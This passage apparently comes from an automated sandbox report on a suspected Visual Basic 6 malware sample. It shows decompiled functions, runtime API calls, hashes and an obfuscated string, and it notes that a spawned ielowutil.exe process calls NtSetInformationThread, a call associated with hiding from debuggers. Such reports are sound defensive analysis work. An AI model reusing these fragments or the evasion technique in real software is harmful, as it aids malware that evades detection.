Function 021F4358, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d879648968d9c41ab0de9ac3454b12b91e1dd2156ee6a0e19051b749be028545
Instruction ID: fd6f0d240df644007de0472c5e006e66ee46c0ec2cce72df37e2843d32d0fbdb
Opcode Fuzzy Hash: d879648968d9c41ab0de9ac3454b12b91e1dd2156ee6a0e19051b749be028545
Instruction Fuzzy Hash: 1EC01238289260CBE7CCCA09E590F23B2B2BB44700F821498AB36C7A60C368E800CA00

Uniqueness

Uniqueness Score: -1.00%

Function 021F291E, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa4f3e2f4c556565fcd08a0b3c7a97b36bc15e4a1b56f94a4a1f270f312f397
Instruction ID: 4815cd1b648e07f6589ed335b4f754cc468437ff6992521c9bd3e7d81d4aa661
Opcode Fuzzy Hash: baa4f3e2f4c556565fcd08a0b3c7a97b36bc15e4a1b56f94a4a1f270f312f397
Instruction Fuzzy Hash: A8B092B67015808FEF06CB0CD581B0473A0FB48748B0804E0E002CB712C224E900CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1BC, Relevance: 21.1, APIs: 14, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D1BC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a24, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v36;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v124;
				signed int _v128;
				char* _t51;
				signed int _t57;
				intOrPtr _t64;
				void* _t80;
				void* _t82;
				intOrPtr _t83;

				_t83 = _t82 - 0xc;
				 *[fs:0x0] = _t83;
				L004011C0();
				_v16 = _t83;
				_v12 = 0x4011a0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x68,  *[fs:0x0], 0x4011c6, _t80);
				L0040127A();
				L0040127A();
				L00401262();
				if( *0x410010 != 0) {
					_v124 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v124 = 0x410010;
				}
				_t64 =  *((intOrPtr*)( *_v124));
				_t51 =  &_v56;
				L004012AA();
				_v108 = _t51;
				_v96 = 0x80020004;
				_v104 = 0xa;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 =  *0x401198;
				_t57 =  *((intOrPtr*)( *_v108 + 0x1cc))(_v108, _t64, 0x10, 0x10, 0x10, _t51,  *((intOrPtr*)(_t64 + 0x308))( *_v124));
				asm("fclex");
				_v112 = _t57;
				if(_v112 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x409f4c);
					_push(_v108);
					_push(_v112);
					L004012B0();
					_v128 = _t57;
				}
				L0040129E();
				asm("wait");
				_push(E0040D335);
				L00401274();
				L00401274();
				L00401298();
				return _t57;
			}

0x0040d1bf
0x0040d1ce
0x0040d1d8
0x0040d1e0
0x0040d1e3
0x0040d1ea
0x0040d1f9
0x0040d202
0x0040d20d
0x0040d218
0x0040d224
0x0040d23e
0x0040d226
0x0040d226
0x0040d22b
0x0040d230
0x0040d235
0x0040d235
0x0040d24f
0x0040d259
0x0040d25d
0x0040d262
0x0040d265
0x0040d26c
0x0040d273
0x0040d27a
0x0040d281
0x0040d288
0x0040d292
0x0040d29c
0x0040d29d
0x0040d29e
0x0040d29f
0x0040d2a3
0x0040d2ad
0x0040d2ae
0x0040d2af
0x0040d2b0
0x0040d2b4
0x0040d2be
0x0040d2bf
0x0040d2c0
0x0040d2c1
0x0040d2c9
0x0040d2d4
0x0040d2da
0x0040d2dc
0x0040d2e3
0x0040d2ff
0x0040d2e5
0x0040d2e5
0x0040d2ea
0x0040d2ef
0x0040d2f2
0x0040d2f5
0x0040d2fa
0x0040d2fa
0x0040d306
0x0040d30b
0x0040d30c
0x0040d31f
0x0040d327
0x0040d32f
0x0040d334

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040D1D8
__vbaStrCopy.MSVBVM60(?,?,?,?,004011C6), ref: 0040D202
__vbaStrCopy.MSVBVM60(?,?,?,?,004011C6), ref: 0040D20D
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040D218
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,004011C6), ref: 0040D230
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D25D
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040D292
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040D2A3
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040D2B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001CC,?,?,00000000), ref: 0040D2F5
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0040D306
__vbaFreeStr.MSVBVM60(0040D335,?,?,00000000), ref: 0040D31F
__vbaFreeStr.MSVBVM60(0040D335,?,?,00000000), ref: 0040D327
__vbaFreeVar.MSVBVM60(0040D335,?,?,00000000), ref: 0040D32F

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$ChkstkFree$Copy$CheckHresultNew2
String ID:
API String ID: 1877802341-0
Opcode ID: fe3be088ecc809d95c9565b8f025900c56c5ca28917ee76556827de69ae38700
Instruction ID: c248fa1dc761d484b2dfb3c88e9d399ab45801096f9b489c11a9f8575492d42f
Opcode Fuzzy Hash: fe3be088ecc809d95c9565b8f025900c56c5ca28917ee76556827de69ae38700
Instruction Fuzzy Hash: 17410470910209DBDF01EFA1D846BDEBBB5AF09704F20446EF501BB2A1CBB96949CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA4, Relevance: 16.6, APIs: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040CBA4(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				short _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				short _v128;
				char _v132;
				signed int _v136;
				char* _t65;
				signed int _t69;
				char* _t73;
				signed int _t80;
				char* _t82;
				intOrPtr _t89;
				void* _t98;
				void* _t100;
				intOrPtr _t101;
				char _t107;

				_t107 = __fp0;
				_t101 = _t100 - 0xc;
				 *[fs:0x0] = _t101;
				L004011C0();
				_v16 = _t101;
				_v12 = 0x401150;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4011c6, _t98);
				if( *0x410010 != 0) {
					_v116 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v116 = 0x410010;
				}
				_t65 =  &_v32;
				L004012AA();
				_v92 = _t65;
				_t69 =  *((intOrPtr*)( *_v92 + 0xd8))(_v92,  &_v88, _t65,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x308))( *_v116));
				asm("fclex");
				_v96 = _t69;
				if(_v96 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x409f4c);
					_push(_v92);
					_push(_v96);
					L004012B0();
					_v120 = _t69;
				}
				if( *0x410010 != 0) {
					_v124 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v124 = 0x410010;
				}
				_t89 =  *((intOrPtr*)( *_v124));
				_t73 =  &_v36;
				L004012AA();
				_v100 = _t73;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v88;
				asm("fild dword [ebp-0x7c]");
				_v132 = _t107;
				_v76 = _v132;
				_t80 =  *((intOrPtr*)( *_v100 + 0x1cc))(_v100, _t89, 0x10, 0x10, 0x10, _t73,  *((intOrPtr*)(_t89 + 0x308))( *_v124));
				asm("fclex");
				_v104 = _t80;
				if(_v104 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x409f4c);
					_push(_v100);
					_push(_v104);
					L004012B0();
					_v136 = _t80;
				}
				_push( &_v36);
				_t82 =  &_v32;
				_push(_t82);
				_push(2);
				L00401286();
				asm("wait");
				_push(E0040CD8B);
				return _t82;
			}

0x0040cba4
0x0040cba7
0x0040cbb6
0x0040cbc0
0x0040cbc8
0x0040cbcb
0x0040cbd2
0x0040cbe1
0x0040cbeb
0x0040cc05
0x0040cbed
0x0040cbed
0x0040cbf2
0x0040cbf7
0x0040cbfc
0x0040cbfc
0x0040cc20
0x0040cc24
0x0040cc29
0x0040cc38
0x0040cc3e
0x0040cc40
0x0040cc47
0x0040cc63
0x0040cc49
0x0040cc49
0x0040cc4e
0x0040cc53
0x0040cc56
0x0040cc59
0x0040cc5e
0x0040cc5e
0x0040cc6e
0x0040cc88
0x0040cc70
0x0040cc70
0x0040cc75
0x0040cc7a
0x0040cc7f
0x0040cc7f
0x0040cc99
0x0040cca3
0x0040cca7
0x0040ccac
0x0040ccaf
0x0040ccb6
0x0040ccbd
0x0040ccc4
0x0040cccb
0x0040ccd2
0x0040ccdc
0x0040cce6
0x0040cce7
0x0040cce8
0x0040cce9
0x0040cced
0x0040ccf7
0x0040ccf8
0x0040ccf9
0x0040ccfa
0x0040ccfe
0x0040cd08
0x0040cd09
0x0040cd0a
0x0040cd0b
0x0040cd10
0x0040cd13
0x0040cd16
0x0040cd1d
0x0040cd28
0x0040cd2e
0x0040cd30
0x0040cd37
0x0040cd56
0x0040cd39
0x0040cd39
0x0040cd3e
0x0040cd43
0x0040cd46
0x0040cd49
0x0040cd4e
0x0040cd4e
0x0040cd60
0x0040cd61
0x0040cd64
0x0040cd65
0x0040cd67
0x0040cd6f
0x0040cd70
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040CBC0
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,004011C6), ref: 0040CBF7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CC24
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000000D8), ref: 0040CC59
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040CC7A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCA7
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040CCDC
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040CCED
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040CCFE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001CC,?,?,00000000), ref: 0040CD49
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0040CD67

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Chkstk$CheckHresultNew2$FreeList
String ID:
API String ID: 2221171844-0
Opcode ID: 117bf77207d2b32e586a2864c83c9ceddb2a555824bb46ba0e02b1d533c114be
Instruction ID: 5e26e4f907a54c060743f6347c8d3dcfffe4693dfd0d328492013a13a216a952
Opcode Fuzzy Hash: 117bf77207d2b32e586a2864c83c9ceddb2a555824bb46ba0e02b1d533c114be
Instruction Fuzzy Hash: 1A510471900208EFDB11DFE0C889BDEBBB5BF09704F20456AF505BB2A1C7B95885DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D000, Relevance: 16.6, APIs: 11, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040D000(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12, void* _a32, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v72;
				char _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v92;
				signed int _v96;
				char* _t35;
				signed int _t38;
				intOrPtr _t58;

				_push(0x4011c6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_push(0x4c);
				L004011C0();
				_v12 = _t58;
				_v8 = 0x401180;
				L00401262();
				L00401262();
				L00401262();
				if( *0x410010 != 0) {
					_v92 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v92 = 0x410010;
				}
				_t35 =  &_v76;
				L004012AA();
				_v80 = _t35;
				_t38 =  *((intOrPtr*)( *_v80 + 0x1c4))(_v80, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x308))( *_v92));
				asm("fclex");
				_v84 = _t38;
				if(_v84 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x409f4c);
					_push(_v80);
					_push(_v84);
					L004012B0();
					_v96 = _t38;
				}
				L0040129E();
				_push(E0040D0FE);
				L00401298();
				L00401298();
				L00401298();
				return _t38;
			}

0x0040d005
0x0040d010
0x0040d011
0x0040d018
0x0040d01b
0x0040d023
0x0040d026
0x0040d033
0x0040d03e
0x0040d049
0x0040d055
0x0040d06f
0x0040d057
0x0040d057
0x0040d05c
0x0040d061
0x0040d066
0x0040d066
0x0040d08a
0x0040d08e
0x0040d093
0x0040d09e
0x0040d0a4
0x0040d0a6
0x0040d0ad
0x0040d0c9
0x0040d0af
0x0040d0af
0x0040d0b4
0x0040d0b9
0x0040d0bc
0x0040d0bf
0x0040d0c4
0x0040d0c4
0x0040d0d0
0x0040d0d5
0x0040d0e8
0x0040d0f0
0x0040d0f8
0x0040d0fd

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040D01B
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040D033
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040D03E
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040D049
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,004011C6), ref: 0040D061
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D08E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001C4), ref: 0040D0BF
__vbaFreeObj.MSVBVM60 ref: 0040D0D0
__vbaFreeVar.MSVBVM60(0040D0FE), ref: 0040D0E8
__vbaFreeVar.MSVBVM60(0040D0FE), ref: 0040D0F0
__vbaFreeVar.MSVBVM60(0040D0FE), ref: 0040D0F8

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2
String ID:
API String ID: 1725699769-0
Opcode ID: 70fc71385b0100be1a4da6de100088e5feecd6ab99a3e1d20e0a78dea7b0a09b
Instruction ID: 1173f01629e6a5e9c0a71ae401f3360c45a17e34298bc35353818c6608ed78a6
Opcode Fuzzy Hash: 70fc71385b0100be1a4da6de100088e5feecd6ab99a3e1d20e0a78dea7b0a09b
Instruction Fuzzy Hash: 4721E270910248ABCB04EFE1C856ADDBBB4BF08708F10456AF001BB1A5DBB8694ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE72, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040CE72(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				intOrPtr _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char* _v112;
				intOrPtr _v120;
				void* _v172;
				signed int _v176;
				signed int _v184;
				signed int _v188;
				signed int _t51;
				signed int _t55;
				char* _t56;
				void* _t73;
				intOrPtr _t75;

				 *[fs:0x0] = _t75;
				L004011C0();
				_v12 = _t75;
				_v8 = 0x401170;
				L00401262();
				_t51 =  *((intOrPtr*)( *_a4 + 0x114))(_a4, 1, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, __ecx, __ecx, _t73);
				asm("fclex");
				_v176 = _t51;
				if(_v176 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0x114);
					_push(0x409c7c);
					_push(_a4);
					_push(_v176);
					L004012B0();
					_v184 = _t51;
				}
				_t55 =  *((intOrPtr*)( *_a4 + 0x110))(_a4,  &_v172);
				asm("fclex");
				_v176 = _t55;
				if(_v176 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x409c7c);
					_push(_a4);
					_push(_v176);
					L004012B0();
					_v188 = _t55;
				}
				_t56 = _v172;
				if(_t56 == _v40) {
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v112 = L"flbp0bFkqv60zNpTU5LoZql12yeJ8Vsom44";
					_v120 = 8;
					L00401262();
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(0);
					_push( &_v56);
					L0040125C();
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t56 =  &_v56;
					_push(_t56);
					_push(4);
					L00401280();
				}
				_push(E0040CFED);
				L00401298();
				return _t56;
			}

0x0040ce83
0x0040ce8f
0x0040ce97
0x0040ce9a
0x0040cea7
0x0040ceb6
0x0040cebc
0x0040cebe
0x0040cecb
0x0040ceed
0x0040cecd
0x0040cecd
0x0040ced2
0x0040ced7
0x0040ceda
0x0040cee0
0x0040cee5
0x0040cee5
0x0040cf03
0x0040cf09
0x0040cf0b
0x0040cf18
0x0040cf3a
0x0040cf1a
0x0040cf1a
0x0040cf1f
0x0040cf24
0x0040cf27
0x0040cf2d
0x0040cf32
0x0040cf32
0x0040cf41
0x0040cf4c
0x0040cf4e
0x0040cf55
0x0040cf5c
0x0040cf63
0x0040cf6a
0x0040cf71
0x0040cf78
0x0040cf7f
0x0040cf8c
0x0040cf94
0x0040cf98
0x0040cf9c
0x0040cf9d
0x0040cfa2
0x0040cfa3
0x0040cfab
0x0040cfaf
0x0040cfb3
0x0040cfb4
0x0040cfb7
0x0040cfb8
0x0040cfba
0x0040cfbf
0x0040cfc2
0x0040cfe7
0x0040cfec

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040CE8F
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040CEA7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409C7C,00000114), ref: 0040CEE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409C7C,00000110), ref: 0040CF2D
__vbaVarDup.MSVBVM60(00000000,?,00409C7C,00000110), ref: 0040CF8C
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040CFA3
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040CFBA
__vbaFreeVar.MSVBVM60(0040CFED), ref: 0040CFE7

Strings

flbp0bFkqv60zNpTU5LoZql12yeJ8Vsom44, xrefs: 0040CF78

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$#595ChkstkList
String ID: flbp0bFkqv60zNpTU5LoZql12yeJ8Vsom44
API String ID: 3766636844-1736305172
Opcode ID: 834eefa8551816b6bfff5705b618b120fc34d5062b1fb2e42bd20e8f63d849c5
Instruction ID: bf012b720d0a2165136853136f9931de8dbf8c8977e7dbd74aabd75282720c94
Opcode Fuzzy Hash: 834eefa8551816b6bfff5705b618b120fc34d5062b1fb2e42bd20e8f63d849c5
Instruction Fuzzy Hash: 3D41E8B1900309EFDB01DF91C985FDEBBB9EB05704F1081AAF205BA1A1D7785A45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAC4, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040CAC4(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v44;
				signed int _v48;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4011c6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x1c);
				L004011C0();
				_v12 = _t40;
				_v8 = 0x401140;
				if( *0x410010 != 0) {
					_v44 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v44 = 0x410010;
				}
				_t26 =  &_v28;
				L004012AA();
				_v32 = _t26;
				_t29 =  *((intOrPtr*)( *_v32 + 0x1c0))(_v32, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v44)) + 0x308))( *_v44));
				asm("fclex");
				_v36 = _t29;
				if(_v36 >= 0) {
					_v48 = _v48 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x409f4c);
					_push(_v32);
					_push(_v36);
					L004012B0();
					_v48 = _t29;
				}
				L0040129E();
				_push(E0040CB89);
				return _t29;
			}

0x0040cac9
0x0040cad4
0x0040cad5
0x0040cadc
0x0040cadf
0x0040cae7
0x0040caea
0x0040caf8
0x0040cb12
0x0040cafa
0x0040cafa
0x0040caff
0x0040cb04
0x0040cb09
0x0040cb09
0x0040cb2d
0x0040cb31
0x0040cb36
0x0040cb41
0x0040cb47
0x0040cb49
0x0040cb50
0x0040cb6c
0x0040cb52
0x0040cb52
0x0040cb57
0x0040cb5c
0x0040cb5f
0x0040cb62
0x0040cb67
0x0040cb67
0x0040cb73
0x0040cb78
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040CADF
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,004011C6), ref: 0040CB04
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004011C6), ref: 0040CB31
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001C0,?,?,?,?,?,?,?,004011C6), ref: 0040CB62
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,004011C6), ref: 0040CB73

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: c0ea256bf3c99b7c5571564cf636b51a39d4430fea89c38bb0fd08a8252cc886
Instruction ID: 2984bb27634e90cd31c89a89df46b5038552f7ed2c03d77116c21b654d171358
Opcode Fuzzy Hash: c0ea256bf3c99b7c5571564cf636b51a39d4430fea89c38bb0fd08a8252cc886
Instruction Fuzzy Hash: 0711C870A50209EFDB00DF95D846FEEBBB4AB0C754F10456AF101B72A1C7BD6441DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDB2, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040CDB2(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v44;
				signed int _v48;
				signed int _v60;
				signed int _t27;
				void* _t34;
				void* _t36;
				intOrPtr _t37;

				_t37 = _t36 - 0xc;
				 *[fs:0x0] = _t37;
				L004011C0();
				_v16 = _t37;
				_v12 = 0x401160;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x4011c6, _t34);
				L00401262();
				asm("fld1");
				_v44 = __fp0;
				_t27 =  *((intOrPtr*)( *_a4 + 0x104))(_a4,  &_v44);
				asm("fclex");
				_v48 = _t27;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x104);
					_push(0x409c7c);
					_push(_a4);
					_push(_v48);
					L004012B0();
					_v60 = _t27;
				}
				asm("wait");
				_push(E0040CE49);
				L00401298();
				return _t27;
			}

0x0040cdb5
0x0040cdc4
0x0040cdce
0x0040cdd6
0x0040cdd9
0x0040cde0
0x0040cdef
0x0040cdf8
0x0040cdfd
0x0040ce00
0x0040ce0b
0x0040ce11
0x0040ce13
0x0040ce1a
0x0040ce36
0x0040ce1c
0x0040ce1c
0x0040ce21
0x0040ce26
0x0040ce29
0x0040ce2c
0x0040ce31
0x0040ce31
0x0040ce3a
0x0040ce3b
0x0040ce43
0x0040ce48

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040CDCE
__vbaVarDup.MSVBVM60(?,?,?,?,004011C6), ref: 0040CDF8
__vbaHresultCheckObj.MSVBVM60(00000000,00401160,00409C7C,00000104), ref: 0040CE2C
__vbaFreeVar.MSVBVM60(0040CE49), ref: 0040CE43

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckChkstkFreeHresult
String ID:
API String ID: 2492882051-0
Opcode ID: 962f81282348ce410084a1ccdbbc5ed9e8f168be5077c03cfba0526a66798d5b
Instruction ID: f8efdffe3e6fee986e7a844680a238a2ddf4c2c1a485fa20a5959d365502218e
Opcode Fuzzy Hash: 962f81282348ce410084a1ccdbbc5ed9e8f168be5077c03cfba0526a66798d5b
Instruction Fuzzy Hash: D711F770900209FFCB01AFA9C889BDDBFB4EF08754F10856AF545BA2A1C77859858B98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ielowutil.exe PID: 7084 Parent PID: 908 ielowutil.exeCOMMON

Executed Functions

Function 02AD5D3D, Relevance: 1.7, APIs: 1, Instructions: 153nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 02AD6035

Memory Dump Source

Source File: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Offset: 02AD1000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 4d7be4a2aa7de24d85a690e488ca0fab19e146ca549f8191ad85fd755c44fb42
Instruction ID: 5b2fb72686607ad1af9138a3ab991fce34ade79260fa26c6b38fb8e451087f47
Opcode Fuzzy Hash: 4d7be4a2aa7de24d85a690e488ca0fab19e146ca549f8191ad85fd755c44fb42
Instruction Fuzzy Hash: AB41E430A08706CEEF359E24D8E47F463B6EB99760FD4822BC9978A194CF7485C5CA52

Uniqueness

Uniqueness Score: -1.00%

Function 02AD5D69, Relevance: 1.6, APIs: 1, Instructions: 121nativethreadCOMMON

Download Yara Rule

APIs

